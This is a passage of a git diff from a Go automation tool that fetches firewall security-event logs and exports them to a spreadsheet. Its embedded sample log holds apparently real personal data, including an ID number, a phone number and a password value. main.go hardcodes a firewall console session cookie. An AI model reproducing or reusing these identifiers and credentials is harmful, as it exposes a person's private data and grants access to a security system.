14:14:15\\\",\\\"applyIdNo\\\":\\\"140203610502431\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13935209411\\\",\\\"applyName\\\":\\\"\\\\e6\\\\88\\\\90\\\\e9\\\\92\\\\a6\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 16:14:21\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500002\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"552187\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000008\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
|
||||||
]
|
|
||||||
}
|
|
||||||
}`
|
|
||||||
processed := strings.Replace(jsonStr, `\`, "", -1)
|
|
||||||
var student Person
|
|
||||||
err := json.Unmarshal([]byte(processed), &student)
|
|
||||||
if err != nil {
|
|
||||||
log.Printf("unmarshal err=%v\n", err)
|
|
||||||
}
|
}
|
||||||
log.Println(student.NTOP.LogPaging[0].InputJSON)
|
}`
|
||||||
}
|
|
||||||
|
|
||||||
type Person struct {
|
|
||||||
NTOP NTOP `json:"NTOP"`
|
|
||||||
}
|
|
||||||
type NTOP struct {
|
|
||||||
LogPaging []LogPaging `json:"LogPaging"`
|
|
||||||
}
|
|
||||||
type LogPaging struct {
|
|
||||||
LogType string `json:"LogType"` //日志ID
|
|
||||||
ID string `json:"ID"`
|
|
||||||
UserID string `json:"UserID"`
|
|
||||||
PageNo string `json:"PageNo"` //页数
|
|
||||||
CountPerPage string `json:"CountPerPage"` //每页计数
|
|
||||||
TotalCounts string `json:"TotalCounts"` //总条数
|
|
||||||
InputJSON InputJSON `json:"InputJSON"` //输入参数
|
|
||||||
OutputJSON OutputJSON `json:"OutputJSON"` //输出参数
|
|
||||||
TimeFilter TimeFilter `json:"TimeFilter"` //本次查询时间区间
|
|
||||||
}
|
|
||||||
|
|
||||||
type InputJSON struct {
|
|
||||||
SrcZoneName string `json:"SrcZoneName"` //源安全域
|
|
||||||
DestZoneName string `json:"DestZoneName"` //目的安全域
|
|
||||||
}
|
|
||||||
|
|
||||||
type OutputJSON struct {
|
|
||||||
SrcPort string `json:"SrcPort"` //源端口
|
|
||||||
DestPort string `json:"DestPort"` //目的端口
|
|
||||||
Action string `json:"Action"`
|
|
||||||
AttackCount string `json:"AttackCount"` //攻击计数
|
|
||||||
SrcVrfIndex string `json:"SrcVrfIndex"`
|
|
||||||
ThreatID string `json:"ThreatID"`
|
|
||||||
Severity string `json:"Severity"`
|
|
||||||
HddInfo string `json:"HddInfo"`
|
|
||||||
Application string `json:"Application"` //应用协议
|
|
||||||
ThreatName string `json:"ThreatName"` //威胁名称
|
|
||||||
SrcRegion string `json:"SrcRegion"` //源区域
|
|
||||||
DestRegion string `json:"DestRegion"` //目的区域
|
|
||||||
ThreatType string `json:"ThreatType"` //威胁类型 {入侵防御}
|
|
||||||
Time string `json:"Time"` //时间
|
|
||||||
ContextName string `json:"ContextName"` //上下文名称
|
|
||||||
Policy string `json:"Policy"` //策略
|
|
||||||
Protocol string `json:"Protocol"` //传输协议
|
|
||||||
SrcIPAddr string `json:"SrcIPAddr"` //源IP
|
|
||||||
User string `json:"User"` //用户
|
|
||||||
DestIPAddr string `json:"DestIPAddr"` //目的IP
|
|
||||||
SrcZoneName string `json:"SrcZoneName"` //源安全域
|
|
||||||
DestZoneName string `json:"DestZoneName"` //目的安全域
|
|
||||||
CVE string `json:"CVE"` //漏洞披露
|
|
||||||
MSB string `json:"MSB"`
|
|
||||||
BID string `json:"BID"`
|
|
||||||
RealIP string `json:"RealIP"`
|
|
||||||
CapturePktName string `json:"CapturePktName"`
|
|
||||||
HttpHost string `json:"HttpHost"` //host头
|
|
||||||
HttpFirstLine string `json:"HttpFirstLine"` //请求路径
|
|
||||||
Payload string `json:"Payload"` //请求数据
|
|
||||||
MethodName string `json:"MethodName"` //方法名称
|
|
||||||
MethodNameCN string `json:"MethodNameCN"` //方法名称中国(攻击类别)
|
|
||||||
MethodSubName string `json:"MethodSubName"` //方法子名称
|
|
||||||
MethodSubNameCN string `json:"MethodSubNameCN"` //方法子名称中国(具体攻击形式)
|
|
||||||
LoginUserName string `json:"LoginUserName"`
|
|
||||||
LoginPassword string `json:"LoginPassword"`
|
|
||||||
}
|
|
||||||
|
|
||||||
type TimeFilter struct {
|
|
||||||
StartTime string `json:"StartTime"`
|
|
||||||
EndTime string `json:"EndTime"`
|
|
||||||
}
|
|
||||||
|
|||||||
@ -2,7 +2,6 @@ package conn
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"crypto/tls"
|
"crypto/tls"
|
||||||
"encoding/json"
|
|
||||||
"io"
|
"io"
|
||||||
"io/ioutil"
|
"io/ioutil"
|
||||||
"log"
|
"log"
|
||||||
@ -13,7 +12,7 @@ import (
|
|||||||
// headers := map[string]string{
|
// headers := map[string]string{
|
||||||
// "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
|
// "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
|
||||||
// }
|
// }
|
||||||
func DT_POST(urls string, headers map[string]string, bytess io.Reader) Person {
|
func DT_POST(urls string, headers map[string]string, bytess io.Reader) string {
|
||||||
url, err := url.Parse(urls)
|
url, err := url.Parse(urls)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Println(err)
|
log.Println(err)
|
||||||
@ -53,14 +52,8 @@ func DT_POST(urls string, headers map[string]string, bytess io.Reader) Person {
|
|||||||
if err != nil {
|
if err != nil {
|
||||||
log.Println(err)
|
log.Println(err)
|
||||||
}
|
}
|
||||||
log.Println(string(body))
|
// log.Println(string(body))
|
||||||
// var gcresp map[string]interface{}
|
return string(body)
|
||||||
// if err := ScanJson(resp, gcresp); err != nil {
|
|
||||||
// log.Println(err)
|
|
||||||
// }
|
|
||||||
var bodys Person
|
|
||||||
json.NewDecoder(resp.Body).Decode(&bodys)
|
|
||||||
return bodys
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// req 请求体 url 请求地址 headers请求头
|
// req 请求体 url 请求地址 headers请求头
|
||||||
|
|||||||
8
main.go
8
main.go
@ -1,8 +1,8 @@
|
|||||||
package main
|
package main
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"dt_automate/attackevent"
|
||||||
"dt_automate/tool"
|
"dt_automate/tool"
|
||||||
"dt_automate/wps"
|
|
||||||
"flag"
|
"flag"
|
||||||
"fmt"
|
"fmt"
|
||||||
"log"
|
"log"
|
||||||
@ -73,18 +73,18 @@ func main() {
|
|||||||
// method.HW_DTCLOUD() //截取运维中心的图片
|
// method.HW_DTCLOUD() //截取运维中心的图片
|
||||||
// method.HW_BAOLJ() //截取堡垒机的图片
|
// method.HW_BAOLJ() //截取堡垒机的图片
|
||||||
//运维巡检文档生成
|
//运维巡检文档生成
|
||||||
wps.HW_SYS_Word() //运维平台word文档生成
|
// wps.HW_SYS_Word() //运维平台word文档生成
|
||||||
// //政务网区截图
|
// //政务网区截图
|
||||||
// method.ZWW_FW1() //截取防火墙的图片
|
// method.ZWW_FW1() //截取防火墙的图片
|
||||||
// method.ZWW_TSGZ() //截取态势感知的图片
|
// method.ZWW_TSGZ() //截取态势感知的图片
|
||||||
// method.ZWW_DTCLOUD() //截取运维中心的图片
|
// method.ZWW_DTCLOUD() //截取运维中心的图片
|
||||||
// method.ZWWW_BAOLJ() //截取堡垒机的图片
|
// method.ZWWW_BAOLJ() //截取堡垒机的图片
|
||||||
//运维巡检文档生成
|
//运维巡检文档生成
|
||||||
wps.ZWW_SYS_Word() //运维平台word文档生成
|
// wps.ZWW_SYS_Word() //运维平台word文档生成
|
||||||
//安全巡检文档生成
|
//安全巡检文档生成
|
||||||
// wps.SAFET_Word() //安全巡检文档生成
|
// wps.SAFET_Word() //安全巡检文档生成
|
||||||
//安全事件表格生成(需要先执行互联网区防火墙截图)
|
//安全事件表格生成(需要先执行互联网区防火墙截图)
|
||||||
// attackevent.Fw_event("vindex==3a=18=0AB00=0R; supportLang=cn%2Cen; lang=cn; sessionid=200001b7412db35d796213e8e98a20f69ccd; loginid=6c0a82d050f61bf767ea5b5398eb6d17; 200001b7412db35d796213e8e98a20f69ccd=true; abcd1234=true; login=false") //将防火墙安全事件存放到xlsx文件中
|
attackevent.Fw_event("vindex==3a=18=0AB00=0R; supportLang=cn%2Cen; lang=cn; sessionid=200001b7412db35d796213e8e98a20f69ccd; loginid=6c0a82d050f61bf767ea5b5398eb6d17; 200001b7412db35d796213e8e98a20f69ccd=true; abcd1234=true; login=false") //将防火墙安全事件存放到xlsx文件中
|
||||||
// attackevent.Ceshi()
|
// attackevent.Ceshi()
|
||||||
}
|
}
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
BIN
防火墙安全事件.xlsx
Normal file
BIN
防火墙安全事件.xlsx
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user